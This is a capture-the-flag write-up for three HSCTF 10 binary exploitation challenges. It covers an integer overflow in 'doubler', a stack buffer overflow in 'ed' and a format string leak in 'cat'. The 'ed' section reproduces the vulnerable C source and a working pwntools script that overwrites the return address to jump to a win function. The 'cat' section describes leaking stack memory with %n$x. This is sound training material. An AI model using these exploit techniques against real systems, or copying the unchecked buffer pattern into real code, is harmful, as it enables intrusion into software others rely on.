Binary exploitation challenges in HSCTF 10


doubler

It looks like we need an integer overflow so that the doubled number comes out as exactly -100. The maximum positive (32-bit signed) integer is 2147483647, so from there we just work backwards to get -100.
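As an added example (not part of the original writeup), the working-backwards step in Python: it models the doubling as C does on a 32-bit signed int and assumes the binary rejects negative input, so wrapping past INT_MAX is the only route to -100.

```python
# Added example, not the challenge's own code. Assumptions: the binary keeps the
# number in a C `int`, doubles it, compares the result with -100, and rejects
# negative input (otherwise entering -50 would trivially work).

INT_MAX = 2147483647  # the value quoted in the writeup


def to_int32(value: int) -> int:
    """Reduce any integer to the value a two's-complement 32-bit int would hold."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


def double32(x: int) -> int:
    """The challenge's `x * 2` as C performs it on a 32-bit int: it wraps, not grows."""
    return to_int32(2 * x)


def solve(target: int) -> int:
    """Work backwards from INT_MAX for a negative, even target.

    Doubling INT_MAX wraps to -2, and each step down by one lowers the wrapped
    result by two, so the number of steps below INT_MAX is (-2 - target) / 2.
    """
    if target % 2:
        raise ValueError("a doubled int is always even; %d is unreachable" % target)
    start = double32(INT_MAX)          # -2 after the wrap
    steps = (start - target) // 2      # how far below INT_MAX we must go
    candidate = INT_MAX - steps
    if not 0 < candidate <= INT_MAX:
        raise ValueError("no positive int doubles to %d" % target)
    if double32(candidate) != target:  # self-check against the model
        raise AssertionError("model disagrees with arithmetic")
    return candidate


if __name__ == "__main__":
    x = solve(-100)
    print(x, "doubles to", double32(x))  # 2147483598 doubles to -100
```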

Flag: flag{double_or_nothing_406c561}


ed

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Win function: prints the flag from the environment. */
int flag() {
        puts(getenv("FLAG"));
        return 0;
}

int main(int argc, char** argv) {
        char input[24];                 /* only 24 bytes, but fgets below reads up to 64 */
        char filename[24] = "\0";
        char buffer[64];
        FILE* f = NULL;
        setvbuf(stdout, 0, 2, 0);       /* 2 == _IONBF: unbuffered, so output shows up immediately */
        setvbuf(stdin, 0, 2, 0);
        if (argc > 1) {
                strncpy(filename, argv[1], 23);
        }
        while (1) {
                /* Bug: reads up to 63 bytes into the 24-byte input buffer (stack overflow). */
                fgets(input, 64, stdin);
                input[strcspn(input, "\n")] = 0;
                if (input[0] == 'Q') {
                        /* Returning from main pops the (possibly overwritten) return address. */
                        return 0;
                } else if (input[0] == 'f') {
                        /* "f <name>": set the file name. */
                        if (strlen(input) >= 3) {
                                strcpy(filename, input + 2);
                        }

                        if (filename[0] == '\0') {
                                puts("?");
                        } else {
                                puts(filename);
                        }
                } else if (input[0] == 'l') {
                        /* "l": print the current file, refusing names that contain '/'. */
                        if (filename[0] == '\0') {
                                puts("?");
                        } else {
                                if (strchr(filename, '/') != NULL) {
                                        puts("?");
                                        continue;
                                }

                                f = fopen(filename, "r");
                                if (f == NULL) {
                                        puts("?");
                                        continue;
                                }

                                while (fgets(buffer, 64, f)) {
                                        printf("%s", buffer);
                                }
                                fclose(f);
                        }
                } else {
                        puts("?");
                }
        }
}

There is a buffer overflow (fgets reads up to 64 bytes into the 24-byte input buffer) that lets us overwrite the saved return address and return into the flag function:

It crashed; the offset to the return address is 40 bytes. A quick pwntools script against the server gives the flag.

from pwn import *

r = remote("ed.hsctf.com", 1337)

# fixed address of flag() in the binary
flag = p64(0x00000000004011d2)

# 40 bytes of padding reach the saved return address, then overwrite it with flag().
# The line starts with 'A', so the program just answers "?" and loops.
r.sendline(b"A"*40 + flag)
r.recv()
# 'Q' makes main() return, which now jumps to flag()
r.sendline(b"Q")
print(r.recv())

Flag: flag{real_programmers_use_butterflies}


cat

A simple format string bug. I extracted the flag using %n$x, stepping n through the positive integers, and decoded the leaked hex with CyberChef.

By the 14th argument the flag was complete.

Flag: flag{cats_go_meow}